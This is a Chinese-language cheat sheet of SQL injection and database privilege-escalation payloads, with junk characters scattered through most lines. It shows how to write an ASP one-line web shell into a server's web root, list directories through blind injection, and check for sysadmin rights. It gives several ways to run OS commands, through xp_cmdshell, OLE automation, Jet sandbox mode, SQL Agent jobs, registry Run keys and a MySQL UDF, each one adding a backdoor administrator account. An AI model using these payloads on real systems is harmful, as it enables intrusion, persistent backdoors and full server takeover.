MSSQL语句导出一句话木马
$ l8 k2 R9 I1 o, y5 Z9 y首先确定网站的WEB路径
" T8 F) ?% ~5 N5 `5 e;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
/ Y7 l$ m1 i, }8 ?& S: }0 v
1 {1 D% {7 Q7 d6 T: F6 i0 Q8 P;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- . J# i8 @7 U. [! C) y6 {
//将一句话木马插入表中) { R7 R: |! O# s6 m8 K8 m
3 M0 q0 b0 k7 H- o+ c
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- $ x. D. M! [# p3 h( U
//导出一个ASP文件: f; L" w% v+ R( Q# q, I
4 E7 v6 s( m }9 U2 o
4 i* C) u2 e8 z; E关于MSSQL列目录
6 e: C) ~+ \' J, P0 t# r. S, P1 g;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
" x7 Q8 N5 e2 q7 e$ g& CInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表( P2 b; `9 r# j: G' R
; }, n4 {# r% C8 Y* qand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
1 |/ B- R9 k, S
1 B: _( W. W( f( O8 n" R1 L7 d5 UAnd (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段: B- Z' M& i! W) c
& U) A! D9 f7 E" \( H
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符4 b2 Q6 _; X1 @ e8 n6 H! g
, f; q( U# w, x4 G! L4 _+ t) D- s; v
% N5 K- r/ l1 B& v, V数据库版本和权限查看
! r/ G) N$ p9 N6 jand 1=(select @@VERSION) //查看详细的数据库信息." o3 W0 m1 [- U# j0 [6 R( t
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
2 }2 t. H8 [/ d% sand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER. h0 d! Q+ f8 E4 l9 l# o+ Z
7 ]/ R- M: F8 d
4 \" g# F C: Q. i, K1.利用xp_cmdshell执行命令' t3 a! e# A: H5 n# {
exec master..xp_cmdshell 'net user rfire 123456 /add'6 c D7 N7 Z" l5 [0 a/ c
exec master..xp_cmdshell 'net localgroup administrators rfire /add': b& A, R& s6 C1 z% y4 ~
3 q, }/ e1 u. U9 L5 R恢复xp_cmdshell存储过程3 m/ R" E1 ^/ b: ~. |; [
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
$ K. d4 c* k3 @& g% c3 m5 s3 M! S* k1 |3 ^ d& L
/ R4 m( ~! N2 ~' U' i8 f2.利用SP_OAcreate和SP_OAMETHOD执行命令
C( V2 O, u7 E1 `在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下5 |/ o( n( s: v! `9 W( x5 P8 f
DECLARE @shell INT //建立一个@shell实体$ S4 {; [. [! U" c/ f X; q
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
/ c6 Q, a0 j4 C0 d1 h; ]; h) Q2 AEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例0 [( [9 }7 W+ f0 p* p2 B
! G! i. r+ c! a( A# @# h
' ]' \) j& I3 N3.利用沙盒模式
& R6 B( E* j0 R先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。 r1 Y5 k$ O: z. b
开启沙盒模式:+ @! O( c; E" I' F+ x
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
) c \' C$ t% B) Q. \; ]+ K1 q- @) L) H" n$ o9 x: A: h) R9 x ?
执行命令:3 T- u* S' z9 g3 r# Z
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
( k' k( G6 \0 W" a. t) t! A/ `; Q T, W9 A& y. U4 w
6 [+ w: c8 s$ q5 H2 A; U5 z, L+ P4.利用SQL代理执行命令
' I4 K U8 U5 jEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务* N" y- Q* E+ R* z8 v
' Q( v$ B* W9 J# w# d6 [/ ^! X2 O- b
执行命令:$ R# I. B% K% Q" A( v9 i; Q
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错 g: y0 w4 W- e: J. |
exec sp_add_job 'x'" G$ s! F! b+ P: }" u9 U
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业3 a4 y4 G4 W+ {' J+ w9 E2 v a6 U B
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业4 d" c; \ S% L/ f
% n. i. u% ?$ o. F
* {5 P& j2 }& r/ T3 O. c5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
3 O; B" x- I0 |EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'3 S5 l. W% K& g$ h0 L9 n( G0 a' G8 V$ k
: n8 ~7 U% a8 V5 g) S+ L
9 h: b/ K7 O2 k3 i; C; f0 M; I
6.MYSQL的命令执行( ]) F5 m. i4 @% q) H
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
/ \5 B" Q( @9 |9 f' M首先要在su.php下导出c:\windows\udf.dll4 R5 X( T) g# l- e5 j/ W
导出后执行创建自定义函数命令:
8 r7 O0 }8 s" w8 BCreate Function cmdshell returns string soname 'udf.dll'
6 d) h# L; y0 ^执行命令# Z/ \- G& Y0 o* o' ~- b5 \: B( M
select cmdshell('net user rfire 123456 /add')
& z: B) M3 n6 L1 N v执行后删除函数 drop function cmdshell
! U) H+ u' R+ ?# P. `* j( [ |